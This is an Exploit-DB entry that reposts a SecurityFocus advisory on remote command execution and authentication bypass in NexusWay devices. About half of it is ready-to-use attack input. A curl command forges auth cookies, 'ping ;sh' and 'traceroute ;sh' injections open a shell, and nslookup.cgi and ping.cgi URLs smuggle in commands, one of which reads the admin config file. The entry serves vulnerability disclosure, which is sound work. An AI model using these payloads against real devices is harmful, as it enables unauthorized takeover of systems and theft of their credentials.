https://www.exploit-db.com/exploits/25648

漏洞细节尚未披露

source: http://www.securityfocus.com/bid/13596/info

NexusWay is reportedly affected by multiple remote vulnerabilities. These issues can allow an unauthorized attacker to execute arbitrary commands and gain administrative access to an affected device.

All versions of NexusWay are considered vulnerable at the moment. 

# curl -k -b 'cyclone500_write=1; cyclone500_auth=1;
client_ip1;client=0.0.0.0' https://www.example.com/index.cgi

ping ;sh
traceroute ;sh

https://www.example.com/nslookup.cgi?ip=localhost%26%26cat%20/stand/htdocs/config/admin
https://www.example.com/ping.cgi?ip=localhost%26%26touch+/tmp/test